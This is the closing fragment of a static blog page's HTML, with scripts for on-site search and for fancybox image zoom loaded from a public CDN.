  <script src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>











</body>
</html>
